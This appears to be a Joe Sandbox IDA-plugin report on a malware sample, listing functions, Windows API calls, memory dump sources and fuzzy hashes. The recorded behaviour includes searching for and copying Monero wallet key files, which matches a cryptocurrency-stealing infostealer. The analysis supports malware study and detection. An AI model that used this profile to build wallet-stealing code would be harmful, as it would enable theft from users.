Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: a969f93570849c67efd3a7366a91afe1739796ba6287316a379b3976642a21d4
Instruction ID: 159b7464ab224b6b2802326f96a7fa6501b952e045801fc5e19ffccfa5adbd9f
Opcode Fuzzy Hash: a969f93570849c67efd3a7366a91afe1739796ba6287316a379b3976642a21d4
Instruction Fuzzy Hash: BFF096B1904208EBCB10CF89DC45FAAF7BCF748714F000669F51593680D77569048BD1

Function 0098B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

lstrlen.KERNEL32(00000000), ref: 0098B9C2
lstrlen.KERNEL32(00000000), ref: 0098B9D6

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 975a872aa560b4267b000fef9c33a859ec1adeec9d43c4a93ad90bb254599bca
Instruction ID: 8aae65715e4951b6face52cfb3078f8732718115d75b10ef3610af58ae7a9579
Opcode Fuzzy Hash: 975a872aa560b4267b000fef9c33a859ec1adeec9d43c4a93ad90bb254599bca
Instruction Fuzzy Hash: A4E1CE729201189BDF05EBA5DC92FEE7338FF98304F444169F506660A1EF346A49CBE6

Function 0098AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

lstrlen.KERNEL32(00000000), ref: 0098B16A
lstrlen.KERNEL32(00000000), ref: 0098B17E

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: bae9879e71e83ea4d9a2a234e4051ce3ae4e1fef1d2c91219b57f702161c3e8e
Instruction ID: 08ccee303e04dc73d3e1784e5aaed7c337a40c80e8ddc2be9506e8e599c90d60
Opcode Fuzzy Hash: bae9879e71e83ea4d9a2a234e4051ce3ae4e1fef1d2c91219b57f702161c3e8e
Instruction Fuzzy Hash: 5791FB729201189BDF04FBA9DC96EEE7338EF94304F444169F506A7191EF346A09CBE6

Function 0098B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

lstrlen.KERNEL32(00000000), ref: 0098B42E
lstrlen.KERNEL32(00000000), ref: 0098B442

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: ebd14b17a8fc936de61d970536c9b8677e146e8dfc50eb508a7625ca59c0fb73
Instruction ID: 0c650969b93e4022522cae06f239b1ab4a20b4ac5be5e2d41057ae550e93c3bd
Opcode Fuzzy Hash: ebd14b17a8fc936de61d970536c9b8677e146e8dfc50eb508a7625ca59c0fb73
Instruction Fuzzy Hash: AE710A719201189BCF04FBA9DC96EEE7339FF94304F444528B506A71A1EF346A09CBE6

Function 00994BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00998DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00998E0B

lstrcat.KERNEL32(?,00000000), ref: 00994BEA
lstrcat.KERNEL32(?,0157D720), ref: 00994C08

Part of subcall function 00994910: wsprintfA.USER32 ref: 0099492C
Part of subcall function 00994910: FindFirstFileA.KERNEL32(?,?), ref: 00994943

Part of subcall function 00994910: StrCmpCA.SHLWAPI(?,009A0FDC), ref: 00994971
Part of subcall function 00994910: StrCmpCA.SHLWAPI(?,009A0FE0), ref: 00994987
Part of subcall function 00994910: FindNextFileA.KERNEL32(000000FF,?), ref: 00994B7D
Part of subcall function 00994910: FindClose.KERNEL32(000000FF), ref: 00994B92

Part of subcall function 00994910: wsprintfA.USER32 ref: 009949B0
Part of subcall function 00994910: StrCmpCA.SHLWAPI(?,009A08D2), ref: 009949C5
Part of subcall function 00994910: wsprintfA.USER32 ref: 009949E2
Part of subcall function 00994910: PathMatchSpecA.SHLWAPI(?,?), ref: 00994A1E
Part of subcall function 00994910: lstrcat.KERNEL32(?,0157E4D8), ref: 00994A4A
Part of subcall function 00994910: lstrcat.KERNEL32(?,009A0FF8), ref: 00994A5C
Part of subcall function 00994910: lstrcat.KERNEL32(?,?), ref: 00994A70
Part of subcall function 00994910: lstrcat.KERNEL32(?,009A0FFC), ref: 00994A82
Part of subcall function 00994910: lstrcat.KERNEL32(?,?), ref: 00994A96
Part of subcall function 00994910: CopyFileA.KERNEL32(?,?,00000001), ref: 00994AAC
Part of subcall function 00994910: DeleteFileA.KERNEL32(?), ref: 00994B31

Part of subcall function 00994910: wsprintfA.USER32 ref: 00994A07

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: f6c2f5e5b17fe85befd78711a94768c57f444d97e856b4bdeda75a49830e9ba6
Instruction ID: 8aa9d91897e4b22855668f96906f77576d7e4ee95712271b49abb067cc5925e6
Opcode Fuzzy Hash: f6c2f5e5b17fe85befd78711a94768c57f444d97e856b4bdeda75a49830e9ba6
Instruction Fuzzy Hash: AE41A3B65001086BCB54FBA4FC46EEE333DA7CD704F008548B54997286ED755B898BE2

Function 00986660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00986706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00986753

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9821fab048a2216a924e8ed9d744dfb8fccfe1e8cb355bb19b1e19b1c1bacfbc
Instruction ID: f010820beb4fa577d960aad3a81162eb1f076a46f828eabcd5bc41271dd41b45
Opcode Fuzzy Hash: 9821fab048a2216a924e8ed9d744dfb8fccfe1e8cb355bb19b1e19b1c1bacfbc
Instruction Fuzzy Hash: B741C274A00209EFCB44DF98C494BADBBB1FB48314F2486A9E9599F345D735EA81CF84

Function 00995050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00998DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00998E0B

lstrcat.KERNEL32(?,00000000), ref: 0099508A
lstrcat.KERNEL32(?,0157DD08), ref: 009950A8

Part of subcall function 00994910: wsprintfA.USER32 ref: 0099492C
Part of subcall function 00994910: FindFirstFileA.KERNEL32(?,?), ref: 00994943

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 3bd4aea94b443e4e74012cd678cdf7437e2a6d3f57c52821e305b935306b8dab
Instruction ID: 7dbc84564218737b003959ce36cb210d9774e3207f97b231ac97cf2c2d643589
Opcode Fuzzy Hash: 3bd4aea94b443e4e74012cd678cdf7437e2a6d3f57c52821e305b935306b8dab
Instruction Fuzzy Hash: 6401967690020C67CB54FB74DC47FEE733CAB99704F004548B64997191EE71AAC98BE2

Function 009810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009810B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009810F7

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 8b2198729915d841949b5331758c8eb20c54c86fe414c6601b3bdfec23db4772
Instruction ID: ce8e7297e34accee3220262413515f019f4a95b03af9918c92708b8e40c08fe5
